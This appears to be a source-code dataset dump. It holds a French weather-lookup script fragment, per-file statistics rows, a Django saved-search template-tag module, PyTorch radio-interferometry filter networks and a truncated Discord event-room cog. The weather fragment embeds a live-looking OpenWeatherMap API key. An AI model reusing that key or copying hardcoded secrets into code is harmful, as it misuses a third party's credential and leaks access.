    "http://api.openweathermap.org/data/2.5/weather"
    "?q={city}&appid=1b980eb95427e4049b7e9fdd2819958b&units=metric"
)

for city in ("croix", "Lille", "calais"):
    weather_data = requests.get(URL_TEMPLATE.format(city=city)).json()
    ville = weather_data['name']
    print("Météo à %s" % (ville))  # "Weather in <city>"
    print(weather_data['main']['temp'], "°C")
    print(weather_data['main']['humidity'], "%")
    print(weather_data['main']['pressure'], "HPA")
    print(weather_data['clouds']['all'], 'nuage')  # cloud cover
    print(weather_data['weather'][0]['description'])
    print("il fait %s" % (weather_data['weather'][0]['description']))  # "it is <description>"
| 32.56
| 118
| 0.677518
| 211
| 1,628
| 5.127962
| 0.194313
| 0.243993
| 0.221811
| 0.166359
| 0.962107
| 0.962107
| 0.962107
| 0.962107
| 0.962107
| 0.962107
| 0
| 0.052561
| 0.088452
| 1,628
| 49
| 119
| 33.22449
| 0.674528
| 0.006757
| 0
| 0.870968
| 0
| 0.096774
| 0.420681
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.032258
| 0
| 0.032258
| 0.677419
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
659105fd900dabc31b7d9e0f22c0134db43d6353
| 4,100
|
py
|
Python
|
saved_searches/templatetags/saved_searches_tags.py
|
django-haystack/saved_searches
|
a2674f83c18d1053d724d879c67e882162328a4b
|
[
"BSD-3-Clause"
] | 13
|
2015-04-03T22:29:43.000Z
|
2021-09-27T11:53:08.000Z
|
saved_searches/templatetags/saved_searches_tags.py
|
toastdriven/saved_searches
|
a2674f83c18d1053d724d879c67e882162328a4b
|
[
"BSD-3-Clause"
] | null | null | null |
saved_searches/templatetags/saved_searches_tags.py
|
toastdriven/saved_searches
|
a2674f83c18d1053d724d879c67e882162328a4b
|
[
"BSD-3-Clause"
] | 11
|
2015-02-23T20:32:07.000Z
|
2020-05-02T16:26:23.000Z
|
from django import template
from saved_searches.models import SavedSearch
register = template.Library()
class MostRecentNode(template.Node):
def __init__(self, varname, user=None, search_key=None, limit=10):
self.varname = varname
self.user = user
self.search_key = search_key
self.limit = int(limit)
def render(self, context):
user = None
search_key = None
if self.user is not None:
temp_user = template.Variable(self.user)
user = temp_user.resolve(context)
if self.search_key is not None:
temp_search_key = template.Variable(self.search_key)
search_key = temp_search_key.resolve(context)
context[self.varname] = SavedSearch.objects.most_recent(user=user, search_key=search_key)[:self.limit]
return ''
@register.tag
def most_recent_searches(parser, token):
"""
Returns the most recent queries seen. By default, returns the top 10.
Usage::
{% most_recent_searches as <varname> [for_user user] [for_search_key search_key] [limit n] %}
Example::
{% most_recent_searches as recent %}
{% most_recent_searches as recent for_user request.user %}
{% most_recent_searches as recent for_search_key "general" %}
{% most_recent_searches as recent limit 5 %}
{% most_recent_searches as recent for_user request.user for_search_key "general" limit 15 %}
"""
bits = token.split_contents()
tagname = bits[0]
bits = bits[1:]
if len(bits) < 2:
raise template.TemplateSyntaxError("%r tag requires at least two arguments." % tagname)
varname = bits[1]
bits = iter(bits[2:])
user = None
search_key = None
limit = 10
for bit in bits:
        if bit == 'for_user':
            user = next(bits)
        if bit == 'for_search_key':
            search_key = next(bits)
        if bit == 'limit':
            limit = next(bits)
return MostRecentNode(varname, user, search_key, limit)
class MostPopularNode(template.Node):
def __init__(self, varname, user=None, search_key=None, limit=10):
self.varname = varname
self.user = user
self.search_key = search_key
self.limit = int(limit)
def render(self, context):
user = None
search_key = None
if self.user is not None:
temp_user = template.Variable(self.user)
user = temp_user.resolve(context)
if self.search_key is not None:
temp_search_key = template.Variable(self.search_key)
search_key = temp_search_key.resolve(context)
context[self.varname] = SavedSearch.objects.most_popular(user=user, search_key=search_key)[:self.limit]
return ''
@register.tag
def most_popular_searches(parser, token):
"""
Returns the most popular queries seen. By default, returns the top 10.
Usage::
{% most_popular_searches as <varname> [for_user user] [for_search_key search_key] [limit n] %}
Example::
{% most_popular_searches as popular %}
{% most_popular_searches as popular for_user request.user %}
{% most_popular_searches as popular for_search_key "general" %}
{% most_popular_searches as popular limit 5 %}
{% most_popular_searches as popular for_user request.user for_search_key "general" limit 15 %}
"""
bits = token.split_contents()
tagname = bits[0]
bits = bits[1:]
if len(bits) < 2:
raise template.TemplateSyntaxError("%r tag requires at least two arguments." % tagname)
varname = bits[1]
bits = iter(bits[2:])
user = None
search_key = None
limit = 10
for bit in bits:
        if bit == 'for_user':
            user = next(bits)
        if bit == 'for_search_key':
            search_key = next(bits)
        if bit == 'limit':
            limit = next(bits)
return MostPopularNode(varname, user, search_key, limit)
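
# Usage sketch (an assumption based on the module path): in a template this
# library would be loaded by its module name, e.g.
#
#     {% load saved_searches_tags %}
#     {% most_popular_searches as popular limit 5 %}
#     <ul>{% for search in popular %}<li>{{ search }}</li>{% endfor %}</ul>
#
# Both tags place a sliced SavedSearch queryset in the named context variable;
# the fields available on each item depend on the SavedSearch model.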
| 30.597015
| 111
| 0.61561
| 509
| 4,100
| 4.756385
| 0.151277
| 0.141264
| 0.061958
| 0.074349
| 0.909542
| 0.834366
| 0.782321
| 0.782321
| 0.782321
| 0.722842
| 0
| 0.009599
| 0.288537
| 4,100
| 133
| 112
| 30.827068
| 0.820363
| 0.249512
| 0
| 0.857143
| 0
| 0
| 0.044746
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077922
| false
| 0
| 0.025974
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65cce303cdb7ac0a4b1a47b8e1977de59c33754f
| 21,554
|
py
|
Python
|
radionets/dl_framework/architectures/filter_deep.py
|
Kevin2/radionets
|
44e10a85a096f5cea8e9d83f96db65bdd4df9517
|
[
"MIT"
] | 9
|
2021-06-17T10:12:28.000Z
|
2022-03-23T23:04:19.000Z
|
radionets/dl_framework/architectures/filter_deep.py
|
radionets-project/radionets
|
9b87ddbf704e78db55944e70071a7002f6213399
|
[
"MIT"
] | 24
|
2021-02-12T13:57:11.000Z
|
2022-03-03T08:00:31.000Z
|
radionets/dl_framework/architectures/filter_deep.py
|
Kevin2/radionets
|
44e10a85a096f5cea8e9d83f96db65bdd4df9517
|
[
"MIT"
] | 3
|
2020-01-08T09:01:09.000Z
|
2020-10-19T18:53:13.000Z
|
from torch import nn
import torch
from radionets.dl_framework.model import (
Lambda,
LocallyConnected2d,
symmetry,
GeneralELU,
conv_phase,
conv_amp,
)
from functools import partial
from math import pi
from radionets.dl_framework.utils import round_odd, make_padding
class filter_deep_amp(nn.Module):
def __init__(self, img_size):
super().__init__()
self.conv1_amp = nn.Sequential(*conv_amp(1, 4, (23, 23), 1, 11, 1))
self.conv2_amp = nn.Sequential(*conv_amp(4, 8, (21, 21), 1, 10, 1))
self.conv3_amp = nn.Sequential(*conv_amp(8, 12, (17, 17), 1, 8, 1))
self.conv_con1_amp = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv4_amp = nn.Sequential(*conv_amp(1, 4, (5, 5), 1, 4, 2))
self.conv5_amp = nn.Sequential(*conv_amp(4, 8, (5, 5), 1, 2, 1))
self.conv6_amp = nn.Sequential(*conv_amp(8, 12, (3, 3), 1, 2, 2))
self.conv7_amp = nn.Sequential(*conv_amp(12, 16, (3, 3), 1, 1, 1))
self.conv_con2_amp = nn.Sequential(
LocallyConnected2d(16, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv8_amp = nn.Sequential(*conv_amp(1, 4, (3, 3), 1, 1, 1))
self.conv9_amp = nn.Sequential(*conv_amp(4, 8, (3, 3), 1, 1, 1))
self.conv10_amp = nn.Sequential(*conv_amp(8, 12, (3, 3), 1, 2, 2))
self.conv_con3_amp = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.symmetry_real = Lambda(symmetry)
def forward(self, x):
x = x[:, 0].unsqueeze(1)
inp = x.clone()
amp = x[:, 0, :].unsqueeze(1)
amp = self.conv1_amp(amp)
amp = self.conv2_amp(amp)
amp = self.conv3_amp(amp)
amp = self.conv_con1_amp(amp)
# Second block
amp = self.conv4_amp(amp)
amp = self.conv5_amp(amp)
amp = self.conv6_amp(amp)
amp = self.conv7_amp(amp)
amp = self.conv_con2_amp(amp)
# Third block
amp = self.conv8_amp(amp)
amp = self.conv9_amp(amp)
amp = self.conv10_amp(amp)
amp = self.conv_con3_amp(amp)
# inp_amp = inp[:, 0].unsqueeze(1)
x0 = self.symmetry_real(amp).reshape(-1, 1, amp.shape[2], amp.shape[2])
# x0[inp_amp != 0] = inp_amp[inp_amp != 0]
return x0
class filter_deep_phase(nn.Module):
def __init__(self, img_size):
super().__init__()
self.conv1_phase = nn.Sequential(
*conv_phase(1, 4, (23, 23), 1, 11, 1, add=-2.1415)
)
self.conv2_phase = nn.Sequential(
*conv_phase(4, 8, (21, 21), 1, 10, 1, add=-2.1415)
)
self.conv3_phase = nn.Sequential(
*conv_phase(8, 12, (17, 17), 1, 8, 1, add=-2.1415)
)
self.conv_con1_phase = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(-2.1415),
)
self.conv4_phase = nn.Sequential(
*conv_phase(1, 4, (5, 5), 1, 3, 2, add=-2.1415)
)
self.conv5_phase = nn.Sequential(
*conv_phase(4, 8, (5, 5), 1, 2, 1, add=-2.1415)
)
self.conv6_phase = nn.Sequential(
*conv_phase(8, 12, (3, 3), 1, 3, 2, add=-2.1415)
)
self.conv7_phase = nn.Sequential(
*conv_phase(12, 16, (3, 3), 1, 1, 1, add=-2.1415)
)
self.conv_con2_phase = nn.Sequential(
LocallyConnected2d(16, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(-2.1415),
)
self.conv8_phase = nn.Sequential(
*conv_phase(1, 4, (3, 3), 1, 1, 1, add=-2.1415)
)
self.conv9_phase = nn.Sequential(
*conv_phase(4, 8, (3, 3), 1, 1, 1, add=-2.1415)
)
self.conv10_phase = nn.Sequential(
*conv_phase(8, 12, (3, 3), 1, 2, 2, add=-2.1415)
)
self.conv_con3_phase = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(-2.1415),
)
self.symmetry_imag = Lambda(partial(symmetry, mode="imag"))
def forward(self, x):
inp = x.clone()
phase = x[:, 1, :].unsqueeze(1)
# First block
phase = self.conv1_phase(phase)
phase = self.conv2_phase(phase)
phase = self.conv3_phase(phase)
phase = self.conv_con1_phase(phase)
# Second block
phase = self.conv4_phase(phase)
phase = self.conv5_phase(phase)
phase = self.conv6_phase(phase)
phase = self.conv7_phase(phase)
phase = self.conv_con2_phase(phase)
# Third block
phase = self.conv8_phase(phase)
phase = self.conv9_phase(phase)
phase = self.conv10_phase(phase)
phase = self.conv_con3_phase(phase)
# inp_phase = inp[:, 1].unsqueeze(1)
x1 = self.symmetry_imag(phase).reshape(-1, 1, phase.shape[2], phase.shape[2])
# x1[inp_phase != 0] = inp_phase[inp_phase != 0]
return x1
class filter_deep(nn.Module):
def __init__(self, img_size):
super().__init__()
self.conv1_amp = nn.Sequential(*conv_amp(1, 4, (23, 23), 1, 11, 1))
self.conv1_phase = nn.Sequential(
*conv_phase(1, 4, (23, 23), 1, 11, 1, add=1 - pi)
)
self.conv2_amp = nn.Sequential(*conv_amp(4, 8, (21, 21), 1, 10, 1))
self.conv2_phase = nn.Sequential(
*conv_phase(4, 8, (21, 21), 1, 10, 1, add=1 - pi)
)
self.conv3_amp = nn.Sequential(*conv_amp(8, 12, (17, 17), 1, 8, 1))
self.conv3_phase = nn.Sequential(
*conv_phase(8, 12, (17, 17), 1, 8, 1, add=1 - pi)
)
self.conv_con1_amp = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv_con1_phase = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(1 - pi),
)
self.conv4_amp = nn.Sequential(*conv_amp(1, 4, (5, 5), 1, 4, 2))
self.conv4_phase = nn.Sequential(*conv_phase(1, 4, (5, 5), 1, 4, 2, add=1 - pi))
self.conv5_amp = nn.Sequential(*conv_amp(4, 8, (5, 5), 1, 2, 1))
self.conv5_phase = nn.Sequential(*conv_phase(4, 8, (5, 5), 1, 2, 1, add=1 - pi))
self.conv6_amp = nn.Sequential(*conv_amp(8, 12, (3, 3), 1, 2, 2))
self.conv6_phase = nn.Sequential(
*conv_phase(8, 12, (3, 3), 1, 2, 2, add=1 - pi)
)
self.conv7_amp = nn.Sequential(*conv_amp(12, 16, (3, 3), 1, 1, 1))
self.conv7_phase = nn.Sequential(
*conv_phase(12, 16, (3, 3), 1, 1, 1, add=1 - pi)
)
self.conv_con2_amp = nn.Sequential(
LocallyConnected2d(16, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv_con2_phase = nn.Sequential(
LocallyConnected2d(16, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(1 - pi),
)
self.conv8_amp = nn.Sequential(*conv_amp(1, 4, (3, 3), 1, 1, 1))
self.conv8_phase = nn.Sequential(*conv_phase(1, 4, (3, 3), 1, 1, 1, add=1 - pi))
self.conv9_amp = nn.Sequential(*conv_amp(4, 8, (3, 3), 1, 1, 1))
self.conv9_phase = nn.Sequential(*conv_phase(4, 8, (3, 3), 1, 1, 1, add=1 - pi))
self.conv10_amp = nn.Sequential(*conv_amp(8, 12, (3, 3), 1, 2, 2))
self.conv10_phase = nn.Sequential(
*conv_phase(8, 12, (3, 3), 1, 2, 2, add=1 - pi)
)
self.conv11_amp = nn.Sequential(*conv_amp(12, 20, (3, 3), 1, 1, 1))
self.conv11_phase = nn.Sequential(
*conv_phase(12, 20, (3, 3), 1, 1, 1, add=1 - pi)
)
self.conv_con3_amp = nn.Sequential(
LocallyConnected2d(20, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv_con3_phase = nn.Sequential(
LocallyConnected2d(20, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(1 - pi),
)
self.symmetry_real = Lambda(symmetry)
self.symmetry_imag = Lambda(partial(symmetry, mode="imag"))
def forward(self, x):
inp = x.clone()
amp = x[:, 0, :].unsqueeze(1)
phase = x[:, 1, :].unsqueeze(1)
# First block
amp = self.conv1_amp(amp)
phase = self.conv1_phase(phase)
amp = self.conv2_amp(amp)
phase = self.conv2_phase(phase)
amp = self.conv3_amp(amp)
phase = self.conv3_phase(phase)
amp = self.conv_con1_amp(amp)
phase = self.conv_con1_phase(phase)
# Second block
amp = self.conv4_amp(amp)
phase = self.conv4_phase(phase)
amp = self.conv5_amp(amp)
phase = self.conv5_phase(phase)
amp = self.conv6_amp(amp)
phase = self.conv6_phase(phase)
amp = self.conv7_amp(amp)
phase = self.conv7_phase(phase)
amp = self.conv_con2_amp(amp)
phase = self.conv_con2_phase(phase)
# Third block
amp = self.conv8_amp(amp)
phase = self.conv8_phase(phase)
amp = self.conv9_amp(amp)
phase = self.conv9_phase(phase)
amp = self.conv10_amp(amp)
phase = self.conv10_phase(phase)
amp = self.conv11_amp(amp)
phase = self.conv11_phase(phase)
amp = self.conv_con3_amp(amp)
phase = self.conv_con3_phase(phase)
# amp = amp + inp[:, 0].unsqueeze(1)
inp_amp = inp[:, 0].unsqueeze(1)
inp_phase = inp[:, 1].unsqueeze(1)
# phase = phase + inp[:, 1].unsqueeze(1)
x0 = self.symmetry_real(amp).reshape(-1, 1, amp.shape[2], amp.shape[2])
x0[inp_amp != 0] = inp_amp[inp_amp != 0]
x1 = self.symmetry_imag(phase).reshape(-1, 1, phase.shape[2], phase.shape[2])
x1[inp_phase != 0] = inp_phase[inp_phase != 0]
comb = torch.cat([x0, x1], dim=1)
return comb
class filter_deep_variable(nn.Module):
def __init__(self, img_size):
super().__init__()
# ########################## Phase 1
self.conv1_amp = nn.Sequential(
*conv_amp(
ni=1,
nc=4,
ks=(round_odd(0.365 * img_size), round_odd(0.365 * img_size)),
stride=1,
padding=make_padding(round_odd(0.365 * img_size), 1, 1),
dilation=1,
)
)
self.conv1_phase = nn.Sequential(
*conv_phase(
ni=1,
nc=4,
ks=(round_odd(0.365 * img_size), round_odd(0.365 * img_size)),
stride=1,
padding=make_padding(round_odd(0.365 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv2_amp = nn.Sequential(
*conv_amp(
ni=4,
nc=8,
ks=(round_odd(0.333 * img_size), round_odd(0.333 * img_size)),
stride=1,
padding=make_padding(round_odd(0.333 * img_size), 1, 1),
dilation=1,
)
)
self.conv2_phase = nn.Sequential(
*conv_phase(
ni=4,
nc=8,
ks=(round_odd(0.333 * img_size), round_odd(0.333 * img_size)),
stride=1,
padding=make_padding(round_odd(0.333 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv3_amp = nn.Sequential(
*conv_amp(
ni=8,
nc=12,
ks=(round_odd(0.269 * img_size), round_odd(0.269 * img_size)),
stride=1,
padding=make_padding(round_odd(0.269 * img_size), 1, 1),
dilation=1,
)
)
self.conv3_phase = nn.Sequential(
*conv_phase(
ni=8,
nc=12,
ks=(round_odd(0.269 * img_size), round_odd(0.269 * img_size)),
stride=1,
padding=make_padding(round_odd(0.269 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv_con1_amp = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv_con1_phase = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(1 - pi),
)
# #################################### Phase 2
self.conv4_amp = nn.Sequential(
*conv_amp(
ni=1,
nc=4,
ks=(round_odd(0.0793 * img_size), round_odd(0.0793 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0793 * img_size), 1, 2),
dilation=2,
)
)
self.conv4_phase = nn.Sequential(
*conv_phase(
ni=1,
nc=4,
ks=(round_odd(0.0793 * img_size), round_odd(0.0793 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0793 * img_size), 1, 2),
dilation=2,
add=1 - pi,
)
)
self.conv5_amp = nn.Sequential(
*conv_amp(
ni=4,
nc=8,
ks=(round_odd(0.0793 * img_size), round_odd(0.0793 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0793 * img_size), 1, 1),
dilation=1,
)
)
self.conv5_phase = nn.Sequential(
*conv_phase(
ni=4,
nc=8,
ks=(round_odd(0.0793 * img_size), round_odd(0.0793 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0793 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv6_amp = nn.Sequential(
*conv_amp(
ni=8,
nc=12,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 2),
dilation=2,
)
)
self.conv6_phase = nn.Sequential(
*conv_phase(
ni=8,
nc=12,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 2),
dilation=2,
add=1 - pi,
)
)
self.conv7_amp = nn.Sequential(
*conv_amp(
ni=12,
nc=16,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
)
)
self.conv7_phase = nn.Sequential(
*conv_phase(
ni=12,
nc=16,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv_con2_amp = nn.Sequential(
LocallyConnected2d(16, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv_con2_phase = nn.Sequential(
LocallyConnected2d(16, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(1 - pi),
)
# ################################## Phase 3
self.conv8_amp = nn.Sequential(
*conv_amp(
ni=1,
nc=4,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
)
)
self.conv8_phase = nn.Sequential(
*conv_phase(
ni=1,
nc=4,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv9_amp = nn.Sequential(
*conv_amp(
ni=4,
nc=8,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
)
)
self.conv9_phase = nn.Sequential(
*conv_phase(
ni=4,
nc=8,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv10_amp = nn.Sequential(
*conv_amp(
ni=8,
nc=12,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 2),
dilation=2,
)
)
self.conv10_phase = nn.Sequential(
*conv_phase(
ni=8,
nc=12,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 2),
dilation=2,
add=1 - pi,
)
)
self.conv11_amp = nn.Sequential(
*conv_amp(
ni=12,
nc=20,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
)
)
self.conv11_phase = nn.Sequential(
*conv_phase(
ni=12,
nc=20,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv_con3_amp = nn.Sequential(
LocallyConnected2d(20, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv_con3_phase = nn.Sequential(
LocallyConnected2d(20, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(1 - pi),
)
self.symmetry_real = Lambda(symmetry)
self.symmetry_imag = Lambda(partial(symmetry, mode="imag"))
def forward(self, x):
inp = x.clone()
amp = x[:, 0, :].unsqueeze(1)
phase = x[:, 1, :].unsqueeze(1)
# First block
amp = self.conv1_amp(amp)
phase = self.conv1_phase(phase)
amp = self.conv2_amp(amp)
phase = self.conv2_phase(phase)
amp = self.conv3_amp(amp)
phase = self.conv3_phase(phase)
amp = self.conv_con1_amp(amp)
phase = self.conv_con1_phase(phase)
# Second block
amp = self.conv4_amp(amp)
phase = self.conv4_phase(phase)
amp = self.conv5_amp(amp)
phase = self.conv5_phase(phase)
amp = self.conv6_amp(amp)
phase = self.conv6_phase(phase)
amp = self.conv7_amp(amp)
phase = self.conv7_phase(phase)
amp = self.conv_con2_amp(amp)
phase = self.conv_con2_phase(phase)
# Third block
amp = self.conv8_amp(amp)
phase = self.conv8_phase(phase)
amp = self.conv9_amp(amp)
phase = self.conv9_phase(phase)
amp = self.conv10_amp(amp)
phase = self.conv10_phase(phase)
amp = self.conv11_amp(amp)
phase = self.conv11_phase(phase)
amp = self.conv_con3_amp(amp)
phase = self.conv_con3_phase(phase)
# amp = amp + inp[:, 0].unsqueeze(1)
inp_amp = inp[:, 0].unsqueeze(1)
inp_phase = inp[:, 1].unsqueeze(1)
# phase = phase + inp[:, 1].unsqueeze(1)
x0 = self.symmetry_real(amp).reshape(-1, 1, amp.shape[2], amp.shape[2])
x0[inp_amp != 0] = inp_amp[inp_amp != 0]
x1 = self.symmetry_imag(phase).reshape(-1, 1, phase.shape[2], phase.shape[2])
x1[inp_phase != 0] = inp_phase[inp_phase != 0]
comb = torch.cat([x0, x1], dim=1)
return comb
| 33.211094
| 88
| 0.499165
| 2,796
| 21,554
| 3.66166
| 0.036123
| 0.060168
| 0.058019
| 0.045712
| 0.966302
| 0.924106
| 0.911702
| 0.895683
| 0.869799
| 0.864915
| 0
| 0.096407
| 0.36332
| 21,554
| 648
| 89
| 33.262346
| 0.649639
| 0.02162
| 0
| 0.761468
| 0
| 0
| 0.000572
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014679
| false
| 0
| 0.011009
| 0
| 0.040367
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02b61172c00f8b2ce837e1a981fde072c1ea7473
| 27,017
|
py
|
Python
|
cogs/eventmanagement.py
|
costaluu/sloth-bot
|
48727aff5859ec96c48691a638b3b8c0a90c70f9
|
[
"MIT"
] | null | null | null |
cogs/eventmanagement.py
|
costaluu/sloth-bot
|
48727aff5859ec96c48691a638b3b8c0a90c70f9
|
[
"MIT"
] | null | null | null |
cogs/eventmanagement.py
|
costaluu/sloth-bot
|
48727aff5859ec96c48691a638b3b8c0a90c70f9
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands
from extra.menu import ConfirmSkill
from extra import utils
import os
from typing import Dict, Any
from extra.smartroom.event_rooms import EventRoomsTable
mod_role_id = int(os.getenv('MOD_ROLE_ID', 123))
senior_mod_role_id = int(os.getenv('SENIOR_MOD_ROLE_ID', 123))
admin_role_id = int(os.getenv('ADMIN_ROLE_ID', 123))
owner_role_id = int(os.getenv('OWNER_ROLE_ID', 123))
event_manager_role_id = int(os.getenv('EVENT_MANAGER_ROLE_ID', 123))
real_event_manager_role_id = int(os.getenv('REAL_EVENT_MANAGER_ROLE_ID', 123))
preference_role_id = int(os.getenv('PREFERENCE_ROLE_ID', 123))
class EventManagement(EventRoomsTable):
""" A category for event related commands. """
def __init__(self, client) -> None:
""" Class initializing method. """
self.client = client
@commands.Cog.listener()
async def on_ready(self) -> None:
""" Tells when the cog is ready to use. """
print("EventManagement cog is online!")
async def get_event_permissions(self, guild: discord.Guild) -> Dict[Any, Any]:
""" Gets permissions for event rooms. """
# Get some roles
event_manager_role = discord.utils.get(guild.roles, id=event_manager_role_id)
preference_role = discord.utils.get(guild.roles, id=preference_role_id)
mod_role = discord.utils.get(guild.roles, id=mod_role_id)
overwrites = {}
overwrites[guild.default_role] = discord.PermissionOverwrite(
read_messages=False, send_messages=False, connect=False,
speak=False, view_channel=False)
overwrites[preference_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=False, connect=False, view_channel=True)
overwrites[event_manager_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True, manage_messages=True,
mute_members=True, embed_links=True, connect=True,
speak=True, move_members=True, view_channel=True,
manage_permissions=True)
overwrites[mod_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True, manage_messages=True,
mute_members=True, embed_links=True, connect=True,
speak=True, move_members=True, view_channel=True)
return overwrites
# CREATE EVENT
@commands.group()
async def create_event(self, ctx) -> None:
""" Creates an event. """
if ctx.invoked_subcommand:
return
cmd = self.client.get_command('create_event')
prefix = self.client.command_prefix
subcommands = [f"{prefix}{c.qualified_name}" for c in cmd.commands]
subcommands = '\n'.join(subcommands)
embed = discord.Embed(
title="Subcommads",
description=f"```apache\n{subcommands}```",
color=ctx.author.color,
timestamp=ctx.message.created_at
)
await ctx.send(embed=embed)
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def movie(self, ctx) -> None:
""" Creates a Movie Night voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Movie Night`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
cinema_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('CINEMA_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Cinema Club role
overwrites[cinema_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🎥 Movie Night 🎥",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🎥 Movie Night 🎥",
